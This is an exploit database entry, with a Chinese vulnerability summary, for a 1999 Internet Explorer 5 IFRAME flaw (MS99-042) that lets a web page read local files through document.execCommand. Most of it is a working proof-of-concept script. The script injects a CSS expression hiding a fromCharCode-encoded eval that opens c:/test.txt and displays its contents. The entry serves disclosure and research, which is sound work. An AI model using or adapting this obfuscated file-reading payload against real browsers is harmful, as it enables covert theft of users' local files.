https://www.exploit-db.com/exploits/19539
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199910-005

InternetExplorer5存在漏洞。远程攻击者通过IFRAME调用的ExecCommand类函数读取文件。

Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0/Unix 5.0 IFRAME Vulnerability

source: http://www.securityfocus.com/bid/696/info

Internet Explorer 5 will allow a malicious web page to read the contents of local files through a weakness in the IE5 security model. Normally the document.execCommand method is restricted from reading and returning data on the local machine, however if the method is called from within an IFRAME this restriction can be circumvented.

<SCRIPT>
alert("Create text file c:\test.txt and it will be read");
function f()
{
I1.focus();
document.execCommand("selectAll");
document.execCommand("InsertParagraph",false,">"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,84,101,120,116,41)));'");
}
setTimeout('f()',2000);
</SCRIPT>
<IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME>

来源:MS
名称:MS99-042
链接:http://www.microsoft.com/technet/security/bulletin/ms99-042.mspx
来源:MSKB
名称:Q243638
链接:http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q243638